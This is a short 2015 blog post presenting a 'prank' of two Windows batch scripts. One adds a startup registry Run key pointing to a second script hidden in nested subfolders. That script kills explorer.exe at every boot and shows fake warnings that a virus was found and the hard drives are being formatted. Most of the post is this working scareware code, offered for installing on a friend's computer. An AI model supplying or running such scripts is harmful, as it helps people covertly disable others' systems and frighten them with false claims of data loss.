Friday, October 9, 2015


 

Display the fake message to afraid your friend

 Fake Messages

Well this is another modified version of the previous one But it is more realistic and scary.
Message

for the following prank we will be needing 2 batch file One called the installer and another that hides deep within a maze of subfolders. This prank will automatically kick off once the system reboots causing much difficulties to the user. Try it yourself 😉
Installer.bat:
@echo off
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Wi­ndows\CurrentVersion\Run /v test /t reg_sz /d C:\mazeof\subfolders\Running.bat
Running.bat:
@echo off
taskkill /f /im explorer.exe
msg * Warning your computer has detected a virus.
msg * To remove the virus click OK or close this box
msg * Your Hard drives are now being formatted
msg * Please wait ...........
msg * Wait more
msg * Working
msg * Contacting kaspersky
msg * Doing Stuff...
msg * This is annoying isnt it ?
msg * Press Ok to Exit and restart
msg * Oh well that didnt work out well :P

No comments:

Post a Comment